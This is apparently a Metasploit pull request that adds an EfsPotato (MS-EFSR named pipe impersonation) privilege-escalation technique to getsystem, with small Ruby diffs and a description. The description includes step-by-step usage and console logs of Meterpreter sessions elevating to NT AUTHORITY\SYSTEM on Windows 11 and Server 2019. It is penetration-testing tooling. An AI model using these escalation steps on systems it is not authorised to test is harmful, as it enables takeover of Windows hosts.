### PR TITLE
Add 6th `getsystem` technique - EFSRPC Named Pipe Impersonation (AKA EfsPotato)

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -30,7 +30,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 2.0.93)
+      metasploit-payloads (= 2.0.94)
       metasploit_data_models
       metasploit_payloads-mettle (= 1.0.18)
       mqtt
@@ -247,7 +247,7 @@ GEM
       activemodel (~> 6.0)
       activesupport (~> 6.0)
       railties (~> 6.0)
-    metasploit-payloads (2.0.93)
+    metasploit-payloads (2.0.94)
     metasploit_data_models (5.0.5)
       activerecord (~> 6.0)
       activesupport (~> 6.0)

--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -30,7 +30,8 @@ class Priv < Extension
     named_pipe_2: 2,
     token_dup: 3,
     named_pipe_rpcss: 4,
-    named_pipe_print_spooler: 5
+    named_pipe_print_spooler: 5,
+    named_pipe_efs: 6
   }.freeze
 
   #

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
@@ -24,6 +24,7 @@ class Console::CommandDispatcher::Priv::Elevate
   ELEVATE_TECHNIQUE_SERVICE_TOKENDUP        = 3
   ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE_RPCSS = 4
   ELEVATE_TECHNIQUE_NAMEDPIPE_PRINTSPOOLER  = 5
+  ELEVATE_TECHNIQUE_NAMEDPIPE_EFS           = 6
 
   ELEVATE_TECHNIQUE_DESCRIPTION =
     [
@@ -32,7 +33,8 @@ class Console::CommandDispatcher::Priv::Elevate
       'Named Pipe Impersonation (Dropper/Admin)',
       'Token Duplication (In Memory/Admin)',
       'Named Pipe Impersonation (RPCSS variant)',
-      'Named Pipe Impersonation (PrintSpooler variant)'
+      'Named Pipe Impersonation (PrintSpooler variant)',
+      'Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)'
     ]
 
   #

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '2.0.93'
+  spec.add_runtime_dependency 'metasploit-payloads', '2.0.94'
   # Needed for the next-generation POSIX Meterpreter
   spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.18'
   # Needed by msfgui and other rpc components

--- a/modules/post/windows/escalate/getsystem.rb
+++ b/modules/post/windows/escalate/getsystem.rb
@@ -4,13 +4,11 @@
 ##
 
 require 'metasm'
-require 'rex/post/meterpreter/ui/console/command_dispatcher/priv'
 
 class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Priv
 
   def initialize(info = {})
-    techniques = Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Priv::Elevate::ELEVATE_TECHNIQUE_DESCRIPTION
     super(
       update_info(
         info,
@@ -31,8 +29,6 @@ class MetasploitModule < Msf::Post
             ]
           }
         },
-        'Actions' => techniques.map.with_index {|t,i| [i.to_s, { 'Description' => t }]},
-        'DefaultAction' => '0',
         'Notes' => {
           'AKA' => [
             'Named Pipe Impersonation',
@@ -45,6 +41,10 @@ class MetasploitModule < Msf::Post
         }
       )
     )
+
+    register_options([
+      OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-6), otherwise try them all", 0])
+    ])
   end
 
   def unsupported
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Post
   end
 
   def run
-    technique = action.name.to_i
+    technique = datastore['TECHNIQUE'].to_i
 
     unsupported if client.platform != 'windows' || (client.arch != ARCH_X64 && client.arch != ARCH_X86)
 

--- a/modules/post/windows/escalate/getsystem.rb
+++ b/modules/post/windows/escalate/getsystem.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Post
     )
 
     register_options([
-      OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-5), otherwise try them all", 0])
+      OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-6), otherwise try them all", 0])
     ])
   end
 

--- a/modules/post/windows/escalate/getsystem.rb
+++ b/modules/post/windows/escalate/getsystem.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'metasm'
+require 'rex/post/meterpreter/ui/console/command_dispatcher/priv'
 
 class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Priv
 
   def initialize(info = {})
+    techniques = Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Priv::Elevate::ELEVATE_TECHNIQUE_DESCRIPTION
     super(
       update_info(
         info,
@@ -28,13 +30,21 @@ class MetasploitModule < Msf::Post
               priv_elevate_getsystem
             ]
           }
+        },
+        'Actions' => techniques.map.with_index {|t,i| [i.to_s, { 'Description' => t }]},
+        'DefaultAction' => '0',
+        'Notes' => {
+          'AKA' => [
+            'Named Pipe Impersonation',
+            'Token Duplication',
+            'RPCSS',
+            'PrintSpooler',
+            'EFSRPC',
+            'EfsPotato'
+          ]
         }
       )
     )
-
-    register_options([
-      OptInt.new('TECHNIQUE', [false, "Specify a particular technique to use (1-6), otherwise try them all", 0])
-    ])
   end
 
   def unsupported
@@ -43,7 +53,7 @@ class MetasploitModule < Msf::Post
   end
 
   def run
-    technique = datastore['TECHNIQUE'].to_i
+    technique = action.name.to_i
 
     unsupported if client.platform != 'windows' || (client.arch != ARCH_X64 && client.arch != ARCH_X86)
 


### PR DESCRIPTION
This adds a new `getsystem` technique that leverages a flaw in [MS-EFSR](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31), the Encrypting File System Remote RPC interface. This technique is based on the [EfsPotato](https://github.com/zcgonvh/EfsPotato) exploit, which makes use of the MS-EFSR `EfsRpcEncryptFileSrv` method. Local privilege escalation is achieved by performing a named-pipe impersonation, which means `SeImpersonatePrivilege` is required.

This also updates the `windows/escalate/getsystem` post module to use `ACTIONS` instead of the datastore option `TECHNIQUE`. This will allow a better description of each technique in `msfconsole` when using `info` or `show actions` commands. Before this change, it was not possible to get a description of the techniques from `msfconsole`. The user was forced to go through the code to find out which technique to use.

This requires these [changes](https://github.com/rapid7/metasploit-payloads/pull/577) in `metasploit-payloads` to work.

## Verification
- [ ] Start `msfconsole`
- [ ] get a Meterpreter session
- [ ] `session -1`
- [ ] `getuid`
- [ ] **Verify** the current user is **not** `NT AUTHORITY\SYSTEM`
- [ ] `getsystem -t 6`
- [ ] `getuid`
- [ ] **Verify** the current user is `NT AUTHORITY\SYSTEM`
- [ ] `session -K`
- [ ] get another Meterpreter session
- [ ] `use post/windows/escalate/getsystem`
- [ ] `run SESSION=<Session ID> ACTION=6`
- [ ] `session -1`
- [ ] `getuid`
- [ ] **Verify** the current user is `NT AUTHORITY\SYSTEM`

## Scenarios
### Meterpreter `getsystem`
- Windows 11
```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > shell
Process 3620 created.
Channel 1 created.
Microsoft Windows [Version 10.0.22000.675]
(c) Microsoft Corporation. All rights reserved.

C:\>ver
ver

Microsoft Windows [Version 10.0.22000.675]

C:\>exit
exit
meterpreter > getuid
Server username: DESKTOP-26CQRHP\n00tmeg
meterpreter > getsystem -t 6
...got system via technique 6 (Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

- Windows Server 2019
```
msf6 payload(windows/meterpreter/reverse_tcp) > sessions -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : DC02
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MYLAB
Logged On Users : 9
Meterpreter     : x86/windows
meterpreter > shell
Process 4208 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\>ver
ver

Microsoft Windows [Version 10.0.17763.2989]

C:\>exit
exit
meterpreter > getuid
Server username: MYLAB\smbtest2
meterpreter > getsystem -t 6
...got system via technique 6 (Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

### `getsystem` post module
- Windows 11
```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-26CQRHP
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-26CQRHP\n00tmeg
meterpreter >
Background session 1? [y/N]
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use post/windows/escalate/getsystem
msf6 post(windows/escalate/getsystem) > options

Module options (post/windows/escalate/getsystem):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Post action:

   Name  Description
   ----  -----------
   0     All techniques available


msf6 post(windows/escalate/getsystem) > show actions

Post actions:

   Name  Description
   ----  -----------
   0     All techniques available
   1     Named Pipe Impersonation (In Memory/Admin)
   2     Named Pipe Impersonation (Dropper/Admin)
   3     Token Duplication (In Memory/Admin)
   4     Named Pipe Impersonation (RPCSS variant)
   5     Named Pipe Impersonation (PrintSpooler variant)
   6     Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)


msf6 post(windows/escalate/getsystem) > info

       Name: Windows Escalate Get System via Administrator
     Module: post/windows/escalate/getsystem
   Platform: Windows
       Arch:
       Rank: Normal

Provided by:
  hdm <x@hdm.io>

Compatible session types:
  Meterpreter

Available actions:
  Name  Description
  ----  -----------
  0     All techniques available
  1     Named Pipe Impersonation (In Memory/Admin)
  2     Named Pipe Impersonation (Dropper/Admin)
  3     Token Duplication (In Memory/Admin)
  4     Named Pipe Impersonation (RPCSS variant)
  5     Named Pipe Impersonation (PrintSpooler variant)
  6     Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on

Description:
  This module uses the builtin 'getsystem' command to escalate the
  current session to the SYSTEM account from an administrator user
  account.

Also known as:
  Named Pipe Impersonation
  Token Duplication
  RPCSS
  PrintSpooler
  EFSRPC
  EfsPotato

msf6 post(windows/escalate/getsystem) > run SESSION=1 ACTION=6

[+] Obtained SYSTEM via technique 6
[*] Post module execution completed
msf6 post(windows/escalate/getsystem) > sessions -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
